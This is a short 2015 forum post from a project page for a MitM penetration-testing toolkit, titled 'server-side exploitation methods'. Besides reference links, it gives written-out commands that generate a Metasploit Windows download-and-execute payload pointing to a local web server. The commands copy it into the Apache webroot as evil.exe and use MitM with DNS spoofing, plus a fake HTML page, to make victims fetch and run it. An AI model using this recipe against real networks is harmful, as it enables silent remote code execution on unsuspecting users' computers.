-:[ server-side exploitation methods ]:-

MitM pentesting opensource toolkit

Brought to you by: peterubuntu10

-:[ server-side exploitation methods ]:-

Forum: Blog - Red Team - Development

Creator: pedro ubuntu

Created: 2015-01-04

Updated: 2015-01-04

pedro ubuntu - 2015-01-04

# -:[ server-side exploitation methods ]:-

"WINDOWS/DOWNLOAD_EXEC"

http://www.governmentsecurity.org/forum/topic/18370-download-and-exec-payload/
http://www.r00tsec.com/2013/02/howto-single-staged-stagers-payload-of.html
http://www.room362.com/blog/2011/06/26/metasploit-payloads-explained-part-1/
http://www.thegreycorner.com/2010/05/download-and-execute-script-shellcode.html

"generate payload" sudo msfpayload windows/download_exec url="http//192.168.1.68/a.exe" X > evil.exe "port payload to apache webroot" cp evil.exe /var/www/evil.exe then use "MitM+DNS_spoof" to point to apache evil.exe, thats going to make a.exe in C:\windows\a.exe and execute it Remark: clone 'firefox_xpi priv8.sh module' way to inject the URL into the HTML fake webpage

"SERVER SIDE EXPLOITATION" send a url link to client

http://pt.scribd.com/doc/176198248/Back-Track-Tutorials#scribd

Last edit: pedro ubuntu 2015-01-04
If you would like to refer to this comment somewhere else in this project, copy and paste the following link:
- Anonymous
  
  Add attachments
  Cancel
  You seem to have CSS turned off. Please don't fill out this field.
  
  You seem to have CSS turned off. Please don't fill out this field.

Anonymous